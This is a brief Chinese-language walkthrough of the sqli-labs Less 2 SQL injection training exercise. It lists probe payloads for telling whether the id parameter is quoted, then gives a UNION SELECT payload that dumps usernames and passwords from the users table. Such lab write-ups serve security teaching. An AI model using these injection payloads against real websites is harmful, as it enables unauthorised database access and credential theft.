Sqli-labs 02
Less 2
- 与 Less 1 相比,只是在构造SQL语句的时候 id 没有单引号
假设当无括号时,如何判断 id 是在无引号、单引号还是双引号中?
- payload 为 ?id=0
- payload 为 ?id=0′
- payload 为 ?id=0′–+
- payload 为 ?id=0″
- payload 为 ?id=0″–+
可见只有不带任何引号的时候页面未报错,由此推断参数 id 不带引号
payload不带单引号即可
?id=0 union select 1,2,group_concat(username,0x3a,password) from users--+